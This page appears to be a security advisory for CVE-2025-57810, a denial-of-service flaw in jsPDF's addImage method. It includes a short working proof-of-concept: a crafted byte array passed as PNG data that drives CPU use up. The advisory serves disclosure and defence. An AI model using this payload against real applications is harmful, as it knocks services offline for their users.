CVE-2025-57810: jsPDF Denial of Service (DoS)

August 26, 2025

User control of the first argument of the addImage method results in CPU utilization and denial of service.

If given the possibility to pass unsanitized image data or URLs to the addImage method, a user can provide a harmful PNG file that results in high CPU utilization and denial of service.

Other affected methods are: html.

Example payload:

import { jsPDF } from "jpsdf"

const payload = new Uint8Array([117, 171, 90, 253, 166, 154, 105, 166, 154])

const doc = new jsPDF();
const startTime = performance.now();
try {
doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
} finally {
const endTime = performance.now();
console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`);
}

References

Code Behaviors & Features

Detect and mitigate CVE-2025-57810 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →